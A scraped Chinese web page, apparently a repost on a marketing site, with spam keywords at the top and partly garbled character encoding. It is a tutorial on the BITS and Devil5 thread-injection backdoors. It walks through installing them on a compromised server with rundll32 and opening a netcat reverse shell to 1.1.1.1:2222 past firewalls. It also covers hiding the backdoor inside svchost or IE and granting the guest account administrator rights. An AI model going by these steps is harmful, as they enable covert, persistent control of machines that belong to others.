日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
經(jīng)典后門實(shí)例之線程插入后門

線程插入后門其特點(diǎn)就在于插入二字,這種后門在運(yùn)行的時(shí)候并沒有自己的獨(dú)立進(jìn)程,而是插入到其他進(jìn)程中,這樣即便是安裝了防火墻的企業(yè)和用戶,也不能對這樣的后門進(jìn)行有效的防御,這種后門是現(xiàn)在非常主流的一種,很讓防護(hù)的人頭疼,因?yàn)閷λ牟闅⒈容^困難,這種后門本身的功能比較強(qiáng)大。

這類的典范就是國內(nèi)提倡網(wǎng)絡(luò)共享的小榕的BITS了,從它的推出以來,各類安全工具下載園地里BITS就高居榜首,非常多的朋友使用它的過程中感到了方便。

BITS

類型:系統(tǒng)后門

使用范圍:wind200/xp/2003

隱蔽程序:

使用難度:

危害程序:

查殺難度:

BITS其實(shí)是Background Intelligent Transfer Servicer的縮寫,可以在不知不覺中實(shí)現(xiàn)另一種意義的典型的線程插入后門,有以下特點(diǎn):進(jìn)程管理器中看不到;平時(shí)沒有端口,只是在系統(tǒng)中充當(dāng)臥底的角色;提供正向連接和反向連接兩種功能;僅適合用于windows 200/xp/2003。

運(yùn)用舉例

首先我們用3389登錄上肉雞,確定你有SYSTEM的權(quán)限,將BITS.DLL拷貝到服務(wù)器上,執(zhí)行CMD命令:

rundll32.exe bits.dll,install

這樣就激活了BIST,程序用這個(gè)特征的字符來辨認(rèn)使用者,也就相當(dāng)于你的密碼了,然后卸載:rundll32.exe BITS.dll,Uninstall

這是最簡單的使用,這個(gè)后門除了隱蔽性好外,還有兩大特點(diǎn)是非常 值得借鑒的:端口復(fù)用和正反向連接。雖然很多朋友經(jīng)常聽到這兩個(gè)名詞,但并不了解它們,端口復(fù)用就是利用系統(tǒng)正常的TCP端口通訊和控制,比如80、139等,這樣的后門有個(gè)非常 大的好處就是非常 隱蔽,不用自己開端口也不會(huì)暴露自己的訪問,因?yàn)橥ㄓ嵄旧砭褪窍到y(tǒng)的正常訪問!另一個(gè)是反向連接,這個(gè)很常 見,也是后門中一個(gè)經(jīng)典思路,因?yàn)閺姆?wù)器上主動(dòng)方問外邊是不被禁止的,很多很歷害的防火墻就怕這點(diǎn)!

BITS的正向連接很簡單,大家可以參考它的README,這種方式在服務(wù)器沒有防火墻等措施的時(shí)候很管用,可以方便地連接,但是遇到有防火墻這樣的方式就不靈了,得使用下面的反向連接方式:

在本地使用NC監(jiān)聽(如:nc -l -p 1234)

用NC連接目標(biāo)主機(jī)的任何一個(gè)防火墻允許的TCP端口(80/139/445……)

輸入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email]

目標(biāo)主機(jī)的CMD將會(huì)出現(xiàn)NC監(jiān)聽的端口2222,這樣就實(shí)現(xiàn)了繞過防火墻的功能了。

devil5(魔鬼5號)

類型:系統(tǒng)后門

使用范圍:win200/xp/2003

隱蔽程度:

使用難度:

危害程序:

查殺難度:

同BITS一樣,Devil5也是線程插入式的后門,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用習(xí)慣定制端口和需要插入的線程,適合對系統(tǒng)有一定了解的使用都使用,由于是自定義插入線程,所以它更難被查殺,下面我們來看看它的使用。

運(yùn)用舉例:

道德使用它自帶的配置程序EDITDEVIL5.EXE對后門進(jìn)行常規(guī)的配置,包括控制端口、插入線程、連接密碼、時(shí)間間隔等方面關(guān)鍵點(diǎn)是對插入線程的定制,一般設(shè)置成系統(tǒng)自帶的SVCHOST,然后運(yùn)行后門就可以控制了。

我們用TELNET連接上去,連接的格式是:TELNET *** 定制的端口,它和其他后門不同之處在于連接后沒有提示的界面,每次執(zhí)行程序也是分開的,必須要每次都有輸入密碼,比如我們丟掉了服務(wù)器和管賬戶,可以激活GUEST后再將GUEST加到管理員權(quán)限,記得每次執(zhí)行命令后加上“>密碼”就可以了:net localgroup administrators guest /add >hkfx,然后你又可以控制服務(wù)器了。

很明顯示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通過系統(tǒng)自帶端口通訊、執(zhí)行命令比較麻煩,需要每次輸入密碼而且不回顯示輸入內(nèi)容,很容易出錯(cuò)。但是,它有自己的優(yōu)勢:插入線程可以自已定制,比如設(shè)置IE的線程為插入的目標(biāo)就比較難被查殺:自己提供了專門的查殺工具DELDEVIL5.exe,幫助防護(hù)者清理系統(tǒng);而且它可以任意改名和綁定,使用靈活性上比BITS強(qiáng)……大家選擇哪能款就看自己的喜好了。

另外,PortLess BackDoor等工具也是此類的后門,功能強(qiáng)大,隱蔽性稍差,大家有興趣可以自己研究一下。
 

【編輯推薦】

  1. 如何封死黑客后門入侵
  2. 如何利用nc構(gòu)建telnet后門控制
  3. telnet擴(kuò)展后門方式的匯總及研究
  4. 開源軟件為黑客們開好后門?
  5. 用Mysql語句來生成后門木馬方案

 


本文名稱:經(jīng)典后門實(shí)例之線程插入后門
分享路徑:http://www.dlmjj.cn/article/cdsoedh.html